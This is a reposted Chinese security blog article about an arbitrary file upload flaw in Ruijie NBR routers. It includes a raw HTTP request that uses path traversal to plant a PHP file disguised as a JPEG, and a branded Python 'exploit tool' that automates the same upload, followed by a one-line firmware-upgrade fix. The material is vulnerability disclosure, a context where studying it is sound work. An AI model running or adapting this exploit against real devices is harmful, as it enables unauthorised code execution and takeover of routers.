【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具

admin 2023年8月31日00:58:21评论193 views字数 1131阅读3分46秒阅读模式
01

团队声明

该漏洞为我团队漏洞监测平台发现,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

02

漏洞概述

锐捷 NBR 路由器 fileupload.php文件存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器获取服务器权限。

03

影响版本

锐捷 NBR 路由器。

04

漏洞复现

【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具

【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具

出现漏洞的文件在 /ddi/server/fileupload.php, 该文件为标准的文件上传文件。

【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具

POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host: 
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg

<?php phpinfo();?>

【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具

访问上传的文件目录。

【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具

原创工具漏洞检测

【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具

附代码

import requests

def display_banner():

banner = """

_____ _ _____ _____ _____

|_ _| | | __ _ _| __ \

| | | |_ _ __| |__) || | | |__) |

| | | | | | |/ _` | ___/ | | ___/

_| |_| | |_| | (_| | | _| |_|

|_____|_|__,_|__,_|_| |_____|

Welcome to RCS-TEAM !

"""

print(banner)

def main():

display_banner()

url = "http://example.com/ddi/server/fileupload.php?uploadDir=../../321&name=123.php"

headers = {

"Accept": "text/plain, */*; q=0.01",

}

files = {

"file": ("111.php", "<?php phpinfo();?>", "image/jpeg"),

}

response = requests.post(url, headers=headers, files=files)

print("Response Status Code:", response.status_code)

print("Response Content:", response.text)

if __name__ == "__main__":

main()

05

整改意见

①升级到最新版本固件。

原文始发于微信公众号(小白嘿课):【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月31日00:58:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【严重】锐捷 NBR 路由器任意文件上传漏洞复现与利用工具https://cn-sec.com/archives/1995366.html

发表评论

匿名网友 填写信息